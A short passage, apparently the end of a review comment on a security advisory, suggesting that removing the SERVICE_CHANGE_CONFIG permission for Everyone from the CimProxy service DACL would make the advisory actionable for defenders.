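(SERVICE_CHANGE_CONFIG) for Everyone from the CimProxy service DACL` would make the advisory directly actionable for defenders.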
|